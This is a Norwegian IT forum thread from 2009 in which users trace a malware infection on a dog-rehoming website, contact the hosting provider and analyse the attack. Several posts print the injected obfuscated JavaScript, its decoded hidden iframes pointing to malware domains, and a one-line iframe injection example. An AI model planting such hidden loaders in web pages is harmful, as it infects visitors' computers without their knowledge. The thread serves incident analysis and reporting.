[LØST] Ny norsk nettside infisert av malware

63 innlegg i emnet

Skrevet

i så tilfelle man skal kontakte eieren av serveren, hvem tar seg av det, og hvordan går man eventuelt frem for å gjøre det? :)

Her er det egentlig to valg. Det ene er å kontakte de som hadde nettsiden via mobilnummer de selv har skrevet på nettstedet (om du husker det), jeg vil fraråde noen å gå inn og lete etter det nå som nettstedet er nede (jeg ser på dette som en nødsituasjon som burde tillatt å ringe vedkommende på en fornuftig tid på døgnet, dvs mellom formiddag og før kveldsnytt på nrk). Det går jo også an å sende en epost, selv om jeg vil tro det kan ta litt lengre tid før den blir lest i noen tilfeller... Ikke alle er like avhengige av pc'n som jeg ;)

Andre alternativet er å søke opp hvem som er ansvarlige for serveren ip-adressen peker mot. Det første du må gjøre da, er å finne ipadressen til domenet. Den kan du finne ved å gå på start, kjør, og skrive cmd, og skriv inn nslookup www.omplasseringavhunder.no, da vil du sannsynligvis få opp ipadressen: 83.143.81.14. Den limer du så inn i http://www.db.ripe.net/whois

Du vil videre få informasjon om hvem som eier serveren. I dette tilfellet ServeTheWorld AS som holder til i Oslo. Om der ikke står noen videre informasjon, kan google sikkert hjelpe basert på søk av firmanavnet (ev. brønnøysundregisterene), i dette tilfellet står det oppført en person: Fredrik Rovik med nummer; +47 22 22 28 80. Dette kan vi anta er et jobbnummer, og det blir litt for privat å søke han opp privat for et slikt problem, eller? Der er også oppgitt en epostadresse: kundeservice@servetheworld.net, og med litt flaks, er den epostadressen bemannet også på lørdager, og kanskje også søndager, men det er i alle fall verdt å forsøke. Det er svært vanlig å bruke epost-adresser relatert til "abuse@XXX" under slike omstendigheter, men jeg råder å ikke bruke det, hvis det ikke står oppført.

-ZnarreZ-

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

ItPro skulle hatt guider for slikt.

Du har veiledningen hvor vi kan fjerne malware som kommer inn.

Det er i så mye mere enn kan gjøre,ved dette tilfellet er det og melde fra til eier.

På ikke så kjente sider så må man drive litt detektivarbeid som ZnarreZ viser litt av.

Når det gjelder sider om bevisst er ute etter og legge inn maleware er det prøvd og lage lister før.

Dette går ikke og holde oppdatert,fordi dem skifter adresse fortere enn noen har resusser til og følge med på.

The Spyware Warrior List (ga seg i 2007 p.g.a mangel på resusser til og følge opp)

http://www.spywarewarrior.com/rogue_anti-spyware.htm

Det er par uker siden en mer kjent side var infesert(mpx)

http://itpro.no/supportforum/index.php?showtopic=69729

Morsome er her at avasten til KongKlykken er på jordet

Er faktisk index.php som er infisert ikke omplasering.php jeg gikk nettopp igjennom kildekoden!

Det kan hende at avast har rett her winxzy,uten og ha sett på kildekoden til siden.

"iframe" er vanlig bruke på denne typer infeksjoner av websider,vi så bruk av " iframe" også på mpx sin i infeksjon.

Endret av snippsat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Det er i så mye mye mere enn kan gjøre,ved dette tilfellet er det og melde fra til eier.

På ikke så kjente sider så må man drive litt detektivarbeid som ZnarreZ viser litt av.

Det er nettopp dette jeg tenker på. Når 'ola' kommer inn på en side der han merker det er noe muffens - som at AV sier ifra. Da bør vel i første omgang eieren av domene bli varslet, så de som ev driver serverne osv.... eller skulle han bare gå vekk fra siden og bare la det være. (ikke samme med f.eks barneporr kanskje)

Jeg mener bestemt at det bør sies ifra - problemet er at 'ola' ikke vet hvordan de skal finne domene eieren eller annet. En godt skrevet og illustrert guide hadde hjulpet de - mer enn et innlegg gjemt blant xxxxxx andre skulle jeg tro. Samtidig syns nå jeg det er noe en seriøs IT side bør stå for og opplyse om. Skulle vel hatt en egen seksjon for ting relatert til dette på forsiden(Datasikkerhet f.eks) - der både fjerning, sikring osv har vært med. Slike ting er jo veldig aktuelt og blir vel bare større og større i omfang.

Endret av KarpeSkrotum
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

En godt skrevet og illustrert guide hadde hjulpet de - mer enn et innlegg gjemt blant xxxxxx andre skulle jeg tro.

Samtidig syns nå jeg det er noe en seriøs IT side bør stå for og opplyse om.

Guider av den typen du etterlyser er det VI som skriver - brukerne av forumet. VI inkluderer også DEG. "En seriøs IT-side" er brukerne selv i mange tilfeller.

Innlegg i en tråd er mye kjappere å skrive enn å skrive en guide for forsiden, så ofte ender det med bare et innlegg. Hvis researchen er omfattende er man "fornøyd" med oppgaven når innlegget er ferdig.

Guider for forsiden skrives ofte av noen med spesiell interesse for et tema - kombinert med evnen til å presentere temaet på en oversiktlig måte. Det behøver ikke være samme person som opprinnelig dro igang temaet, siden vi har temmelig variable interesser når det gjelder å skrive guider. Personlig foretrekker jeg å skrive innlegg siden det er kjappere.

Du står temmelig fritt til å bruke materiale fra et innlegg som grunnlag for materiale som er beregnet på forsiden eller under "Guider".

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Joda, men å samle guider og annet rundt temaet sikkerhet, nettvett, hva gjør man når man er infisert, når man oppdager ting på nett, hvordan sikrer man seg best i div scenario osv ... altså en egen seksjon mener jeg hadde vært på sin plass, ettersom hele feltet er ganske så stort. Men dette burde jeg vel postet i tilbakemeldinger til itpro kanskje, så det får bli med dette her nå.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

da har jeg sendt en e-post til servetheworld som eier serveren, og informert de om problemet. nedenfor er tilbakemld jeg fikk. ha ikke gått inn på nettsiden for å sjekke status.

Vi har mottatt din melding, og vil behandle den så fort som mulig. Vanligvis vil du få svar innen en til to arbeidsdager.

Meldingen din har saksnummer: 330111. Vennligst bruk dette saksnummeret ved alle henvendelser om denne saken.

I kontrollpanelet det en FAQ http://faq.servetheworld.net. Der finner du svar på de mest vanlige spørsmålene som vi mottar på kundeservice. Sjekk alltid FAQ’en før du kontakter kundeservice. Da sparer du tid ved å få informasjon med en gang, og kundeservice blir mer effektive ved ikke å bruke tid på spørsmål som du enkelt kan finne i FAQ'en.

Ved å gå til http://helpdesk.servetheworld.net/ kan du sjekke status på dine saker via web. Du får da en liste over alle dine caser og du ser alle mailene som er sendt/besvart. Hvis du har ventet lenge på et svar på en mail, kan det være at mailserveren din ikke har mottat mailen vi har sendt. Gjennom linken overfor kan du likevel lese vårt svar.

Viktig! Dersom du lurer på status på våre servere, sjekk driftsloggen på http://www.servetheworld.no/

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Flott at du gjør serveransvarlig oppmerksom på dette! :thumbup:

Legg gjerne inn svaret fra Servetheworld her, så ser vi om det gjøres noe eller om de skyver ansvar videre..

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

kildekoden (klikk for å vise/skjule)


<!-- ad --><script TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+String.fromCharCode(60)+''+'ifr'+'ame '+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+''+'"'+unescape('%63%65%34%33')+unescape('%32%31')+'f'+unescape('%63%62%33%66')+unescape('%31%35%32')+String.fromCharCode(102)+''+'470'+unescape('%62%35')+unescape('%32%30')+'f'+'3cbf'+'fb'+'05e"'+' n'+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(61)+''+'"8'+unescape('%63%61%35%36')+unescape('%64%65%66%39')+String.fromCharCode(50)+String.fromCharCode(49)+String.fromCharCode(57)+''+unescape('%36')+'c5c3'+unescape('%30%66%36')+'6e0e'+String.fromCharCode(52)+''+'8'+unescape('%31%35')+'80'+unescape('%66')+unescape('%36%22%20')+unescape('%20%77%69')+'dt'+unescape('%68%3D%31%20')+unescape('%68%65%69')+'ght='+String.fromCharCode(49)+String.fromCharCode(32)+String.fromCharCode(102)+''+'r'+'a'+String.fromCharCode(109)+''+unescape('%65%62%6F')+String.fromCharCode(114)+''+'d'+unescape('%65')+'r=0'+unescape('%20%73')+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+''+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+''+unescape('%70%3A%2F')+'/th'+unescape('%65%68%75%67')+'et'+'its'+unescape('%74')+'op.'+'cn/'+unescape('%64%6F')+unescape('%6E%74%73%74')+String.fromCharCode(111)+String.fromCharCode(112)+String.fromCharCode(46)+''+String.fromCharCode(104)+''+String.fromCharCode(116)+String.fromCharCode(109)+''+'l'+'"><'+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+''+unescape('%61%6D%65%3E')+'');</SCRIPT>
en litt tips, bruk Hosts det du finne \windows\system32\drivers\etc
127.0.0.1 www.omplasseringavhunder.no

127.0.0.1 omplasseringavhunder.no



Edit: 361199.jpeg

Endret av WinFS
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Telenor SOC sier dette er et økende problem selv om SQL injection er en eldgammel (og enkel ting å beskytte seg imot) metode som er på vei tilbake fordi norske admins rett og slett ikke tror det er et problem lenger.

Anbefalt lesestoff:

Telenor SOC sin presentasjon på Eureka! 2009 konferansen. Se spesielt side 9-25 i den PDF-filen.

Telenor SOC har faktisk også sin egen blogg med mye interessant lesestoff.

Endret av J.K.
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Godt å høre brukere på forumet varsler verten. SQL injection er som sagt et økende problem og det er heller ikke vanskelig å beskytte seg imot det.

Jeg ser dusenvis av hull hver dag på søkemotorer kodet i PHP, en ordentlig klisje. Ellers anbefaler jeg alle som skriver i et webspråk å sette av 10 minutter og forstå denne artikkelen. 10 minutter av din tid er det som skal til for at du ikke klør deg i hodet i timesvis når du oppdager at databasen din er vekk ;)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

her er svaret fra de som eier serveren..

svar på e-post (klikk for å vise/skjule)

Hei,

Beklager ventetiden.

Vi takker for informasjonen og er igang med diverse opprenskningsarbeide for å fjerne det som åpenbart er innskutt kildekode som ikke har opphav hos den som drifter siden. Vi kommer også til å holde et ekstra øye med denne siten i overskuelig fremtid så vi kan få stoppet annet slikt tull. :)

Generelt så vil vi ta oss av drift på systemnivå mens den enkelte kunde tar seg av drift av sin egen konto. Hver enkelt konto vil i utgangspunktet ikke være sikrere enn de script som publiseres der og de aksessprivilegier som settes men i slike tilfeller som dette er det også en del vi kan gjøre da dette er både lett å oppdage og korrigere i ettertid.

Hold oss gjerne informert om du skulle oppleve dette andre steder :)

Mvh,

Kundeservice

Servetheworld

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Ser da også ut som denne siden er klarert nå. Hverken AV eller addon "NoScript" varsler lengre om noe muffens.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Hei

Litt offtopic dette jeg kommer med nå, håper ingen tar seg nær av at jeg "lufter personlige saker" her :P

Jeg har 2 siter som hostes hos proISP.

For morro skyld kjørte jeg en query på proISP og fikk følgende:

organisation:	ORG-FA9-RIPE

org-name:		Fasthost AS

org-type:		LIR

address:		 Fasthost AS

					 Postboks 8865 Youngstorget

					 0028 Oslo

					 Norway

phone:		   +47 22 95 86 68

fax-no:		  +47 22 95 84 92

e-mail:		  ripe@fasthost.no
Videre så kjørte jeg query på mine to siter og fikk følgende info;
inetnum:		 85.17.236.0 - 85.17.236.255

netname:		 LEASEWEB

descr:		   LeaseWeb

descr:		   P.O. Box 93054

descr:		   1090BB AMSTERDAM

descr:		   Netherlands

descr:		   www.leaseweb.com

remarks:		 Please send email to "abuse@leaseweb.com" for complaints

remarks:		 regarding portscans, DoS attacks and spam.

remarks:		 INFRA-AW

country:		 NL

Kan det være slik at proISP kjøper plass i Amsterdam? Mener å huske at det stod at serverene deres var i Norge da jeg bestillte hosting.

Er dog litt usikker...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

ProISP kan du velge om du vil ha serverplass i Norge / Europa / Amerika.

Og der tror jeg grunnen er.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

her er svaret fra de som eier serveren..

svar på e-post (klikk for å vise/skjule)

Hei,

Beklager ventetiden.

Vi takker for informasjonen og er igang med diverse opprenskningsarbeide for å fjerne det som åpenbart er innskutt kildekode som ikke har opphav hos den som drifter siden. Vi kommer også til å holde et ekstra øye med denne siten i overskuelig fremtid så vi kan få stoppet annet slikt tull. :)

Generelt så vil vi ta oss av drift på systemnivå mens den enkelte kunde tar seg av drift av sin egen konto. Hver enkelt konto vil i utgangspunktet ikke være sikrere enn de script som publiseres der og de aksessprivilegier som settes men i slike tilfeller som dette er det også en del vi kan gjøre da dette er både lett å oppdage og korrigere i ettertid.

Hold oss gjerne informert om du skulle oppleve dette andre steder :)

Mvh,

Kundeservice

Servetheworld

Mohahahaha, gjett hvem som er infisert med samme greia igjen da!!

-ZnarreZ-

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

?? sikter du til meg?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Nei, han sikter til omplasseringavhunder.no. Siden er full av drit igjen...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

ja, da har de vel fått seg en skikkelig infeksjon da.. får håpe de ordner det.

:)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

ja, da har de vel fått seg en skikkelig infeksjon da.. får håpe de ordner det.

:)

Jeg rakk å se de var rein i noen minutter etter de gjennopprettet det.... men det tok neppe lang tid før botene fant ip'n og automatisk infiserte den igjen. Skulle nesten ønske ansvarlige på siden også kan opplyse hvor exploitet deres lå slik vi andre kanskje kan være oppmerksom på det. Regner med det er SQL-injection, men det skulle fortsatt vært intresant å vite hvor det skjedde. Men, men... det for den av dere som ønsker å kontakte de (host av serveren) eventuelt spørre etter...

-ZnarreZ-

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

nett.png Endret av Cerium
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Siden er i full drift igjen, og jeg ble virusinfisert. Tror jeg leste at dette ville slå av brannmuren eller noe? Visst ikke, hva er dette tøvet? :P

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Om du har mistanke om en virusinfeksjon lager du deg en egen tråd, og evt følger veiledningen som du finner i dette forumet. :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg rakk å se de var rein i noen minutter etter de gjennopprettet det.... men det tok neppe lang tid før botene fant ip'n og automatisk infiserte den igjen. Skulle nesten ønske ansvarlige på siden også kan opplyse hvor exploitet deres lå slik vi andre kanskje kan være oppmerksom på det. Regner med det er SQL-injection, men det skulle fortsatt vært intresant å vite hvor det skjedde. Men, men... det for den av dere som ønsker å kontakte de (host av serveren) eventuelt spørre etter...

-ZnarreZ-

Dette er en enkelt og grei SQL Injection i databasen med smålinker.

Videre har de ant brukt et SQL Exploit for og få tilgang til informasjonen som ligger på siden i databasen, endret dette og lagt inn nettsider.

I teorien trenger man bare en gjestebok som egentlig ikke har SQL engang, og bare skrive in

<iframe src ="linktilmassemalware"	  width="1" height="1"></iframe>

Denne vil bare lage en liten link som du ikke ser med det første øyekast og så infisere deg! :)

Liten fun ting for folk og lese

Safe Browsing

Diagnostic page for omplasseringavhunder.no

What is the current listing status for omplasseringavhunder.no?

Site is listed as suspicious - visiting this website may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages that we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2009-03-10, and the last time that suspicious content was found on this site was on 2009-03-10.

Malicious software includes 16 scripting exploit(s), 3 trojan(s). Successful infection resulted in an average of 8 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including hayboxiw.cn/, vpsspeedin.ru/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including thehugetitstop.cn/, tozxiqud.cn/.

This site was hosted on 1 network(s) including AS34989 (SERVETHEWORLD).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, omplasseringavhunder.no did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.

* If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Tjaa infisert igjen nå bør vel dem som driver dette skjerpe seg litt.

Tok en nærmere titt på dette,angrepet er fra flere kanter.

Siden legger inn "dontstop.htm"

Tar vi et titt på kildekoden.

dontstop (klikk for å vise/skjule)

<html><head>

<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">

<title>Not Found</title>

</head><body>

<script type="text/javascript" language="JavaScript1.2">document.write(''+'<i'+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(1

9)+''+'e id'+unescape('%3D%22%34%39')+'0'+unescape('%36')+String.fromCharCode(49)+String.fromCharCode(102)+String.fromCharCode(99)+''+unescape('%34%37%36')+unescape('%64%32')+String.fromCharCode(57)+String.fromCharCode(55)+String.fromCharCode(49)+String.fromCharCode(10

)+''+String.fromCharCode(55)+''+String.fromCharCode(50)+String.fromCharCode(101)+String.fromCharCode(102)+''+unescape('%62%39%32%35')+String.fromCharCode(51)+''+unescape('%65')+String.fromCharCode(100)+String.fromCharCode(51)+String.fromCharCode(49)+String.fromCharCode(5

)+''+unescape('%32%37')+'" na'+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(61)+''+unescape('%22%66%62%33')+String.fromCharCode(51)+''+unescape('%64')+'341'+'0e'+String.fromCharCode(48)+String.fromCharCode(55)+String.fromCharCode(101)+String.fromCharCode(10

)+''+unescape('%39%61')+'22'+unescape('%65%31%37%30')+unescape('%66%63%33')+unescape('%39%38')+unescape('%34')+String.fromCharCode(57)+String.fromCharCode(101)+String.fromCharCode(51)+''+String.fromCharCode(53)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(32)

''+unescape('%77%69')+'dth'+'='+unescape('%31')+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+''+'i'+'ght='+unescape('%31%20')+unescape('%66%72%61')+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(98)+''+unescape('%6F%72')+unescape('%64%65%72')+unescape('%3D%30%20%73')+'rc'+'="ht'+'tp'+unescape('%3A%2F')+String.fromCharCode(47)+String.fromCharCode(116)+''+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(104)+String.fromCharCode(

17)+''+String.fromCharCode(103)+String.fromCharCode(101)+String.fromCharCode(116)+String.fromCharCode(

05)+''+String.fromCharCode(116)+String.fromCharCode(115)+''+'to'+'p.'+unescape('%63%6E')+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(116)+''+String.fromCharCode(111)+String.fromCharCode(112)+''+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(108)+''+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(1

4)+''+String.fromCharCode(116)+String.fromCharCode(109)+''+'l"'+unescape('%3E%3C')+String.fromCharCode(47)+String.fromCharCode(105)+''+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(1

9)+String.fromCharCode(101)+String.fromCharCode(62)+''+''+''+unescape('%3C%69%66%72')+String.fromCharCode(97)+String.fromCharCode(109)+''+unescape('%65%20%69')+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(5

)+''+unescape('%64%31%61')+unescape('%33')+'32'+'c'+unescape('%65')+String.fromCharCode(51)+String.fromCharCode(57)+String.fromCharCode(53)+''+unescape('%36%62')+unescape('%38')+String.fromCharCode(56)+String.fromCharCode(97)+String.fromCharCode(51)+String.fromCharCode(56

+''+unescape('%35')+String.fromCharCode(55)+String.fromCharCode(48)+String.fromCharCode(49)+String.fromCharCode(49

+''+'b5f0'+unescape('%38%64%65')+unescape('%36')+unescape('%22%20')+String.fromCharCode(110)+String.fromCharCode(97)+''+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(61)+''+'"25'+'c'+String.fromCharCode(102)+String.fromCharCode(48)+''+String.fromCharCode(55)+''+unescape('%63%64%34%35')+unescape('%37%34')+unescape('%37%36%30')+'c'+String.fromCharCode(57)+''+'80'+String.fromCharCode(101)+''+String.fromCharCode(98)+String.fromCharCode(50)+''+String.fromCharCode(53)+String.fromCharCode(56)+''+unescape('%62%39%34%36')+unescape('%37%62%38')+String.fromCharCode(56)+String.fromCharCode(34)+''+String.fromCharCode(32)+String.fromCharCode(32)+''+'wi'+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(

1)+''+String.fromCharCode(49)+String.fromCharCode(32)+''+'hei'+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(

1)+''+'1 '+String.fromCharCode(102)+String.fromCharCode(114)+''+'ame'+unescape('%62%6F%72%64')+'er'+'='+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+''+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34

+''+'ht'+unescape('%74%70%3A')+String.fromCharCode(47)+''+unescape('%2F%74%68%65')+unescape('%68%75')+unescape('%67%65%74')+String.fromCharCode(105)+String.fromCharCode(116)+String.fromCharCode(115)+String.fromCharCode

116)+''+'op'+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110)+String.fromCharCode(47

+''+String.fromCharCode(109)+String.fromCharCode(111)+String.fromCharCode(118)+''+unescape('%65%73%74')+String.fromCharCode(111)+''+'p'+unescape('%2E%68%74%6D')+String.fromCharCode(108)+String.fromCharCode(34)+''+String.fromCharCode(62)+String.fromCharCode(60)+''+String.fromCharCode(47)+String.fromCharCode(105)+''+unescape('%66')+unescape('%72%61%6D%65%3E')+'');</script><iframe id="49061fc476d2971d72efb9253ed31527" name="fb33d3410e07ee9a22e170fc39849e35" src="dontstop_data/stoprules.htm" width="1" frameborder="0" height="1"></iframe><iframe id="6d1a332ce3956b88a3857011b5f08de6" name="25cf07cd4574760c980eb258b9467b88" src="dontstop_data/movestop.htm" width="1" frameborder="0" height="1"></iframe>

</body><script type="text/javascript"><!--

function __RP_Callback_Helper(str, strCallbackEvent, splitSize, func){var event = null;if (strCallbackEvent){event = document.createEvent('Events');event.initEvent(strCallbackEvent, true, true);}if (str && str.length > 0){var splitList = str.split('|');var strCompare = str;if (splitList.length == splitSize)strCompare = splitList[splitSize-1];var pluginList = document.plugins;for (var count = 0; count < pluginList.length; count++){var sSrc = '';if (pluginList[count] && pluginList[count].src)sSrc = pluginList[count].src;if (strCompare.length >= sSrc.length){if (strCompare.indexOf(sSrc) != -1){func(str, count, pluginList, splitList);break;}}}}if (strCallbackEvent)document.body.dispatchEvent(event);}function __RP_Coord_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Coord_Callback = str;pluginList[index].__RP_Coord_Callback_Left = splitList[0];pluginList[index].__RP_Coord_Callback_Top = splitList[1];pluginList[index].__RP_Coord_Callback_Right = splitList[2];pluginList[index].__RP_Coord_Callback_Bottom = splitList[3];};__RP_Callback_Helper(str, 'rp-js-coord-callback', 5, func);}function __RP_Url_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Url_Callback = str;pluginList[index].__RP_Url_Callback_Vid = splitList[0];pluginList[index].__RP_Url_Callback_Parent = splitList[1];};__RP_Callback_Helper(str, 'rp-js-url-callback', 3, func);}function __RP_TotalBytes_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_TotalBytes_Callback = str;pluginList[index].__RP_TotalBytes_Callback_Bytes = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}function __RP_Connection_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Connection_Callback = str;pluginList[index].__RP_Connection_Callback_Url = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}

//--></script></html>

Sier kansje ikke så mye,så her må jeg decode.

Da får man dette resultat.

-----------

<iframe id="49061fc476d2971d72efb9253ed31527" name="fb33d3410e07ee9a22e170fc39849e35" width=1 height=1 frameborder=0 src="http://thehugetitstop.cn/stoprules.html"></iframe>

<iframe id="6d1a332ce3956b88a3857011b5f08de6" name="25cf07cd4574760c980eb258b9467b88" width=1 height=1 frameborder=0 src="http://thehugetitstop.cn/movestop.html"></iframe>

----------

Dette er det mye mere forstålig.

Her ser vi bruk av iframe.

Dette har da som mål og logge seg på en annen webserver og laste ned mere grums.

Legger også inn "movestop.htm" og "stoprules.htm" som har litt av samme oppgave.

Den ene kontaker activeX og den andre starter og laste ned en fil.

Det blir også lagd in en pdf.pdf fil denne har sikkert som mål og utnytte sårbarhet/sikkerhetshullet som er har vært i Adobe Reader.

Angrepet er fra mange kanter,i håp om at sikkerhetprogrammer skal slippe igjennom noe.

Gratis løsningen jeg kjører på avira og online armor stoppet dette greit.

Nå slipper jeg det inn da for og analysere litt.

Endret av snippsat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Ja her går det tregt siden er forsatt full av grums,

Nesten verre nå enn sist jeg gjorde en analyse.

Rammer vel mest dem som er inntrisert i hunder.

Endret av snippsat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive